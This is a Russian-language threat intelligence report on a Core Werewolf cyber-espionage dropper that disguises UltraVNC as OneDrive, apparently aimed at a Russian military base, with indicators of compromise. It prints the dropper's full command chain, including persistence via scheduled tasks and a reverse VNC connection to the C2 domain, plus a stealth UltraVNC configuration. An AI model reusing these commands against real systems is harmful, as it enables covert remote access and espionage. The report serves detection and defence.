Специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженный из Армении (г. Гюмри) вредоносный файл, связанный с группировкой кибершпионов Core Werewolf. Он представляет собой самораспаковывающийся архив 7zSFX, предназначенный для скрытой установки и запуска легитимной программы удаленного доступа - UltraVNC.
Предполагаемой целью атаки является 102-я российская военная база. На это указывают следующие факты:
в качестве документа-приманки использовалось ходатайство о якобы представлении к госнаградам, в том числе "Ордену Мужества" военнослужащих, отличившихся в ходе проведения СВО;
вредоносный файл был загружен на VirusTotal из г. Гюмри (Армения), в котором дислоцируется 102-ая российская военная база.
Core Werewolf (PseudoGamaredon) — кибершпионская группа, которая активно атакует российские организации, связанные с оборонно-промышленным комплексом, объекты критической информационной инфраструктуры. Впервые были замечены в августе 2021 года. В марте 2024 г. Core Werewolf атаковала российский НИИ, занимающийся разработкой вооружения. А в начале апреля — российский оборонный завод. В своих кампаниях группа использует программное обеспечение UltraVNC.
Все подробности — в техническом блоге Дмитрия Купина, руководителя отдела по анализу вредоносного кода департамента Threat Intelligence компании F.A.C.C.T.
Технические детали
7zSFX-архив
Вредоносный файл 7ZSfxMod_x86.exe является исполняемым файлом формата PE32 и представляет собой самораспаковывающийся архив 7zSFX. Данный 7zSFX-архив предназначен для извлечения своего содержимого в каталог %TEMP% и запуск обфусцированного Batch-файла 5951402583331559.cmd.
При запуске самораспаковывающегося архива 7ZSfxMod_x86.exe выполняются следующие команды:
cmd.exe /c ren 5951402583331559 5951402583331559.cmd
cmd.exe /c copy /y "%CD%." "%CD%.."
cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd
Содержимое 7zSFX-архива:
5951402583331559 - обфусцированный Batch-файл
dl02W62Y82w52l62d0.nq42X02g82l12L22i7 - конфигурационный файл UltraVNC (UltraVNC.ini)
Px69S29l29t79I69v3.ei89I49K79k99b89f2 - документ-приманка формата PDF (perevod.pdf)
TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 - исполняемый файл UltraVNC (OneDrives.exe)
Судя по дате и времени последней модификации содержащихся файлов в указанном 7zSFX-архиве, можно предположить, что атака могла начаться раньше 15 апреля 2024 г..
Файл 7ZSfxMod_x86.exe был загружен на VirusTotal 2024-04-15 16:17:23 UTC из Армении (г. Гюмри) через веб-интерфейс (f7a179f4 - web).
Batch-файл
Функциональные возможности Batch-файла 5951402583331559.cmd:
Создание копии PDF-файла документа-приманки:
copy "Px69S29l29t79I69v3.ei89I49K79k99b89f2" "perevod.pdf"
Открытие документа-приманки для отвлечения внимания жертвы:
start "" "%CD%\perevod.pdf"
Создание задачи в планировщике задач Windows для завершения работы процесса OneDrives.exe:
schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012" /tr "taskkill /f /im OneDrives.exe" /sc daily /st 09:11
Создание копии исполняемого файла UltraVNC:
copy "TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0" "OneDrives.exe"
Принудительное завершение задачи или процесса OneDrives.exe:
taskkill /im OneDrives.exe /f
Создание задачи в планировщике задач Windows для запуска OneDrives.exe:
schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe" /sc daily /st 09:12
Создание копии конфигурационного файла UltraVNC:
copy "dl02W62Y82w52l62d0.nq42X02g82l12L22i7" "UltraVNC.ini"
Запуск файла OneDrives.exe:
start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe
Создание задачи в планировщике задач Windows для запуска OneDrives.exe с параметрами подключения к серверу mailcommunity[.]ru:443:
schtasks /create /f /tn "OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443" /sc daily /st 09:13
Запуск файла OneDrives.exe с параметрами для подключения к серверу mailcommunity[.]ru:443:
start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443
Исполняемый файл OneDrives.exe (TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0) является легитимной программой удаленного доступа UltraVNC версии 1.2.0.5.
Документ-приманка
Документ-приманка perevod.pdf представляет собой ходатайство, содержащее список военнослужащих, представленных к госнаградам, в том числе — "Ордену Мужества" — за отличную службу в ходе проведения СВО, с указанием их звания, ФИО и личного номера.
UltraVNC
Злоумышленники используют для скрытого удаленного доступа к скомпрометированной системе легитимное ПО UltraVNC версии 1.2.0.5 с иконкой приложения OneDrive.
PDB-путь: L:\UltraVNC_INSTALL_VS2013\ultravnc_test2\UltraVNC Project Root\UltraVNC\winvnc\Release\winvnc.pdb
Конфигурационный файл UltraVNC.ini (dl02W62Y82w52l62d0.nq42X02g82l12L22i7) содержит следующие настройки:
[Permissions]
[admin]
FileTransferEnabled=1
FTUserImpersonation=1
BlankMonitorEnabled=0
BlankInputsOnly=0
DefaultScale=1
UseDSMPlugin=0
DSMPlugin=
DSMPluginConfig=
primary=1
secondary=0
SocketConnect=0
HTTPConnect=0
XDMCPConnect=0
AutoPortSelect=0
PortNumber=5612
HTTPPortNumber=5800
InputsEnabled=1
LocalInputsDisabled=0
IdleTimeout=0
EnableJapInput=0
RemoveAero=0
DebugMode=0
Avilog=0
path=Y:
DebugLevel=0
AllowLoopback=0
LoopbackOnly=0
AllowShutdown=1
AllowProperties=1
AllowEditClients=1
FileTransferTimeout=30
KeepAliveInterval=5
SocketKeepAliveTimeout=10000
DisableTrayIcon=1
MSLogonRequired=0
NewMSLogon=0
ConnectPriority=0
QuerySetting=2
QueryTimeout=10
QueryAccept=0
LockSetting=0
RemoveWallpaper=0
RemoveEffects=0
RemoveFontSmoothing=0
[UltraVNC]
passwd=отредактировано
passwd2=000000000000000000
Сетевая инфраструктура
В качестве C2 злоумышленники использовали домен mailcommunity[.]ru.
Этот домен был зарегистрирован год назад одновременно с другим доменом группы Core Werewolf, который использовался в кампании в 2023 году. За день до истечения срока жизни домена злоумышленники продлили его еще на год и в этот же день начали использовать его для проведения атак.
Стоит отметить, что разворачиваемый образец UltraVNC, его конфигурационный файл и адрес C2 такие же, как и в ранее раскрытых атаках.
Связанные файлы
Также специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженные из России в марте и апреле 2024 г. вредоносные исполняемые файлы, которые представляют собой ранее неописанные дропперы, реализованные на языке Go. Дропперы имеют идентичные функциональные возможности и они предназначены для скрытой установки и запуска клиента UltraVNC.
Конфигурационный файл и клиент UltraVNC совпадают по хеш-суммам с описанными выше в статье файлами, а также в качестве C2 используется тот же домен: mailcommunity[.]ru:443.
UPD: текст дополнен 17 августа в 14:18.
Индикаторы компрометации
7ZSfxMod_x86.exe
MD5: b4644e784d384e419a270c8a44f41dd2
SHA-1: 210d1c0e007de3c5815b1188de989799ff6b511a
SHA-256: 0de3e1349b12a96a99784c45aebbf88012562545af6ade624e78d0ff2cfd5f35
5951402583331559 (5951402583331559.cmd)
MD5: d41d327f59c2f407a8e946d5bd333fc9
SHA-1: 36ccb806682d370baf8f0f0c7a6424601caaed9a
SHA-256: 493a08471ca2bdb89f980a5b1fb005e31bc1ca714e2da973b708d0b125d6edea
dl02W62Y82w52l62d0.nq42X02g82l12L22i7 (UltraVNC.ini)
MD5: e265d15a83e52b9ced30f6a9d747b388
SHA-1: 6e5a802e42674f6c8de74b7bea6024f637ff39e3
SHA-256: 20b23cc90cbfbef9bb7cedfbb1b75f24a03ba96af8c576263077501814df6376
TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 (OneDrives.exe)
MD5: d45bdf072094435bbb534b9a0c254af5
SHA-1: e1c24d8bfab674937f498701f8b25d07c56dada0
SHA-256: 2bac8b29b52f7ddd4fd19a1ace8bbc2e4ae4e834a41275fb5865eeb5ab805275
Дропперы на Go:
Pdf.exe
MD5: 08b6f274e353ce8baba43624eb552736
SHA-1: 5b1b74b5fe12e11366b63c0d8bce9411330cfb48
SHA-256: bc96b7ee0ec9b01d6ec7b887ca8da6f452fbcc9203d6ab0a8f8ccfe4fe91900f
Pdf.exe
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b
Pdf.exe
MD5: 8ca78dd94dc795db041688a6eedf60a5
SHA-1: 70c9e8eccd43c6426cb9c86a4f76ad6d99d39dca
SHA-256: fbd4a8052a69221f27467904f83b6c36fadf0d77043ac9d0e35b2be2e43ea3a2
Pdf.exe (Указ Президента Российской Федерации от 11.03.2024 № 181.exe)
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b
Домен (С2):
mailcommunity[.]ru:443
IP-адрес:
185.139.70[.]84
Дополнительные индикаторы компрометации
Пути к файлам:
%TEMP%\5951402583331559.cmd
%TEMP%\Px69S29l29t79I69v3.ei89I49K79k99b89f2
%TEMP%\perevod.pdf
%TEMP%\dl02W62Y82w52l62d0.nq42X02g82l12L22i7
%TEMP%\UltraVNC.ini
%TEMP%\TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0
%TEMP%\OneDrives.exe
Процессы:
cmd.exe /c ren 5951402583331559 5951402583331559.cmd
cmd.exe /c copy /y "%CD%*.*" "%CD%.."
cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd
schtasks.exe /create /f /tn "OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012" /tr "taskkill /f /im OneDrives.exe" /sc daily /st 09:11
schtasks.exe /create /f /tn "OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe" /sc daily /st 09:12
schtasks.exe /create /f /tn "OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443" /sc daily /st 09:13
taskkill.exe /im OneDrives.exe /f
OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443
timeout.exe /t 1
timeout.exe /t 3
timeout.exe /t 4
timeout.exe /t 5
Задачи в планировщике задач Windows:
OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012 - "taskkill /f /im OneDrives.exe"
OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102 - "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe"
OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093 - "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443"